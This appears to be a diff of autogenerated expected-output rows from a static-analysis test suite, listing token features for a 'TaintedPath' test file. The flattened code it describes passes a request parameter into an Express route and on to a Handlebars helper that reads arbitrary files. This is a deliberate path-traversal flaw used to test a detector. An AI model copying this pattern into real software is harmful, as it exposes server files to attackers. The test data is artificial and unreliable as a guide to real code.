autogenerated/TaintedPath/handlebars.js:22:28:22:29 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:28:22:29 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:28:22:37 | hb.compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:28:22:37 | hb.compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:28:22:37 | hb.compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:28:22:37 | hb.compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:28:22:37 | hb.compile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | exceptional return of hb.comp ... late")) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | exceptional return of hb.comp ... late")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | exceptional return of hb.comp ... late")) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | exceptional return of hb.comp ... late")) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | exceptional return of hb.comp ... late")) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | assignedToPropName | compiledUnknown | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:28:22:75 | hb.comp ... late")) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:31:22:37 | compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:31:22:37 | compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:31:22:37 | compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:31:22:37 | compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:31:22:37 | compile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:39:22:40 | fs | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:39:22:40 | fs | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:39:22:40 | fs | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:39:22:40 | fs | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:39:22:40 | fs | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:39:22:53 | fs.readFileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:39:22:53 | fs.readFileSync | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:39:22:53 | fs.readFileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:39:22:53 | fs.readFileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:39:22:53 | fs.readFileSync | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:39:22:74 | exceptional return of fs.read ... plate") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:39:22:74 | exceptional return of fs.read ... plate") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:22:39:22:74 | exceptional return of fs.read ... plate") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:39:22:74 | exceptional return of fs.read ... plate") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:39:22:74 | exceptional return of fs.read ... plate") | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | CalleeFlexibleAccessPath | hb.compile | | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | calleeImports | handlebars | @@ -7115,6 +67865,11 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:22:39:22:74 | fs.read ... plate") | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:22:42:22:53 | readFileSync | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:42:22:53 | readFileSync | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:42:22:53 | readFileSync | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:42:22:53 | readFileSync | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:42:22:53 | readFileSync | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | calleeImports | fs | @@ -7124,6 +67879,52 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:22:55:22:73 | "greeting.template" | receiverName | fs | +| autogenerated/TaintedPath/handlebars.js:23:5:23:8 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:5:23:8 | data | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:5:23:8 | data | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:5:23:8 | data | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:5:23:8 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:5:23:22 | data.compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:5:23:22 | data.compiledMixed | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:5:23:22 | data.compiledMixed | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:5:23:22 | data.compiledMixed | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:5:23:22 | data.compiledMixed | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:5:23:111 | data.co ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:5:23:111 | data.co ... ath}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:5:23:111 | data.co ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:5:23:111 | data.co ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:5:23:111 | data.co ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:10:23:22 | compiledMixed | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:10:23:22 | compiledMixed | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:10:23:22 | compiledMixed | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:10:23:22 | compiledMixed | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:10:23:22 | compiledMixed | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:26:23:27 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:26:23:27 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:26:23:27 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:26:23:27 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:26:23:27 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:26:23:35 | hb.compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:26:23:35 | hb.compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:26:23:35 | hb.compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:26:23:35 | hb.compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:26:23:35 | hb.compile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | exceptional return of hb.comp ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | exceptional return of hb.comp ... ath}}") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | exceptional return of hb.comp ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | exceptional return of hb.comp ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | exceptional return of hb.comp ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | assignedToPropName | compiledMixed | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:26:23:111 | hb.comp ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:23:29:23:35 | compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:23:29:23:35 | compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:23:29:23:35 | compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:23:29:23:35 | compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:23:29:23:35 | compile | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | CalleeFlexibleAccessPath | hb.compile | | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | calleeImports | handlebars | @@ -7133,6 +67934,30 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:23:37:23:110 | "helper ... path}}" | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:26:1:26:4 | init | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:26:1:26:4 | init | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:26:1:26:4 | init | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | exceptional return of init() | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | exceptional return of init() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | exceptional return of init() | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | init() | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | init() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:26:1:26:6 | init() | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:1:28:3 | app | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:1:28:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:1:28:3 | app | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:1:28:7 | app.get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:1:28:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:1:28:7 | app.get | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | app.get ... ile)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | app.get ... ile)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | app.get ... ile)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | exceptional return of app.get ... ile)\\n}) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | exceptional return of app.get ... ile)\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:1:30:2 | exceptional return of app.get ... ile)\\n}) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:5:28:7 | get | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:5:28:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:5:28:7 | get | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | calleeImports | express | @@ -7140,6 +67965,26 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:28:9:28:21 | '/some/path1' | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | data | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | data | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | this | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | this | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:24:28:23 | this | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | 'arguments' object of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | exceptional return of anonymous function | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | calleeImports | express | @@ -7147,6 +67992,66 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:28:24:30:1 | functio ... File)\\n} | receiverName | app | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | return of anonymous function | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | return of anonymous function | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:24:30:1 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:34:28:36 | req | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:28:39:28:41 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:5:29:7 | res | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:7 | res | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:5:29:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:5:29:7 | res | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:5:29:12 | res.send | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:12 | res.send | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| autogenerated/TaintedPath/handlebars.js:29:5:29:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/handlebars.js:29:5:29:12 | res.send | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | exceptional return of res.sen ... ath })) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | exceptional return of res.sen ... ath })) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:29:5:29:64 | exceptional return of res.sen ... ath })) | enclosingFunctionBody | req res res send data compiledFileAccess path req params path | +| 